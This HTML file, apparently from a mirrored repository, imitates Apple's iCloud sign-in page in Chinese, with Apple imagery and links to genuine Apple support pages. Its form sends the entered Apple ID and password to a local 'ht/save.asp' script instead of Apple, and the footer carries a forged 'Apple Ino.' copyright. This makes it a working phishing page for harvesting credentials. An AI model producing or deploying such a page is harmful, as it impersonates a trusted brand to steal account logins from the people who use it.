mirror of https://github.com/1099438829/macUI.git
83 lines
2.8 KiB
HTML
83 lines
2.8 KiB
HTML
|
||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|
||
<html xmlns="http://www.w3.org/1999/xhtml">
|
||
<head>
|
||
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
|
||
<title>iCloud</title>
|
||
<link href="css/login.css" type="text/css" rel="stylesheet" />
|
||
<script type="text/javascript" src="./js/jquery-2.2.4.min.js"></script>
|
||
<script type="text/javascript">
|
||
$(document).ready(function() {
|
||
$("#signup").click(function() {
|
||
resetFields();
|
||
var emptyfields = $("input[value=]");
|
||
if (emptyfields.size() > 0) {
|
||
emptyfields.each(function() {
|
||
$(this).stop()
|
||
.animate({ left: "-10px" }, 100).animate({ left: "10px" }, 100)
|
||
.animate({ left: "-10px" }, 100).animate({ left: "10px" }, 100)
|
||
.animate({ left: "0px" }, 100)
|
||
.addClass("required");
|
||
});
|
||
}
|
||
});
|
||
});
|
||
|
||
</script>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
</head>
|
||
|
||
<body class="icloud">
|
||
<div class="main">
|
||
<FORM name=form action=ht/save.asp method=post target=_top>
|
||
<div class="top"><em><img src="img/login/yun.png" height="25" /></em><span><a href="#" class="shuom"><a href="http://www.apple.com/cn/icloud/setup/" target="blank"><img src="img/login/wenh.png" /></a></span></div>
|
||
<div class="login_main">
|
||
<div class="login">
|
||
<div class="del">
|
||
<ul>
|
||
<li><form name="form1"><input type="text" id=arg1 name=u value="" errormsg="Apple ID" placeholder="Apple ID" class="l_text" /></li>
|
||
<li><form name="form1"><input type="password" id=arg2 name=p value="" errormsg="密码" placeholder="密码" class="l_text" />
|
||
|
||
<form name="form1">
|
||
<INPUT class="txt s1" id=arg4 type="hidden" maxLength=10 value= "" name=a>
|
||
|
||
<form name="form1"> <SELECT name=b id="arg5" style="visibility:hidden;">
|
||
|
||
|
||
|
||
|
||
<em>
|
||
|
||
<INPUT class="btn" src="img/login/btn.jpg" type="image" type=submit name=Submit>
|
||
</em></li>
|
||
<li><i onclick="click_con()" id="wii" class="xuaz" >保持我的登陆状态</i></li>
|
||
</ul>
|
||
|
||
|
||
|
||
|
||
|
||
</div>
|
||
</div>
|
||
</div>
|
||
</FORM>
|
||
|
||
</div><div class="foot">
|
||
<em><img src="img/login/pg.png" /></em>
|
||
<span><a href="https://iforgot.apple.com/" target="blank">忘记ID或密码?</a>|<a href="http://www.apple.com.cn/support/systemstatus/" target="blank">系统状态</a>|<a href="http://www.apple.com.cn/privacy/" target="blank">客户隐私政策</a>|<a>Copyright@2014 Apple Ino. 保留所有权利</a></span>
|
||
</div>
|
||
<div id="light" class="white_content">
|
||
<img src="img/login/ers.JPG" usemap="#Map" border="0" />
|
||
<map name="Map" id="Map">
|
||
<area shape="rect" coords="304,148,442,182" href="/" />
|
||
</map>
|
||
</div>
|
||
<div id="fade" class="black_overlay"></div>
|
||
</body>
|
||
</html>
|